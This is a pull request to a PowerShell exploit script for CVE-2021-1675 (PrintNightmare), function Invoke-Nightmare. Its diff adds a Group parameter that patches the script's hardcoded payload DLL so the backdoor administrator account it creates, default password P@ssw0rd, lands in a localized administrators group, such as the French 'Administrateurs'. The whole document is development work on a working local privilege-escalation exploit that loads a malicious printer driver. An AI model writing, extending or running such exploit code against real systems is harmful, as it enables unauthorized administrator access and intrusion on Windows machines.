### PR TITLE
PR to support local group definition

### DIFF
--- a/CVE-2021-1675.ps1
+++ b/CVE-2021-1675.ps1
@@ -23,6 +23,9 @@ function Invoke-Nightmare
         .PARAMETER NewPassword
         The password for the new user when using the default DLL (default: "P@ssw0rd")
 
+        .PARAMETER Group
+        The group for the new user when using the default DLL (default: "Administrators")
+
         .PARAMETER DLL
         The DLL to execute when loading the printer driver (default: a builtin payload which
         creates the specified user, and adds the new user to the local administrators group).
@@ -43,6 +46,7 @@ function Invoke-Nightmare
         [string]$DriverName = "Totally Not Malicious",
         [string]$NewUser = "",
         [string]$NewPassword = "",
+        [string]$Group = "",
         [string]$DLL = ""
     )
 
@@ -66,6 +70,15 @@ function Invoke-Nightmare
             $nightmare_data[0x32c20+$NewPasswordBytes.Length+1] = 0
         } else {
             Write-Host "[+] using default new password: P@ssw0rd"
+        }
+
+        if ( $Group -ne "" ) {
+            $GroupBytes = $encoder.GetBytes($Group)
+            [System.Buffer]::BlockCopy($GroupBytes, 0, $nightmare_data, 0x2de70, $GroupBytes.Length)
+            $nightmare_data[0x2de70+$GroupBytes.Length] = 0
+            $nightmare_data[0x2de70+$GroupBytes.Length+1] = 0
+        } else {
+            Write-Host "[+] using default new group: Administrators"
         }
 
         $DLL = [System.IO.Path]::GetTempPath() + "nightmare.dll"


### PR DESCRIPTION
Hi,

Under a localized Windows (i.e. French), the name of the local admin group might be different (i.e. "Administrateurs").
This PR adds a new "Group" parameters that patches the hardcoded DLL in the script with the specified value.

Cheers.

Marc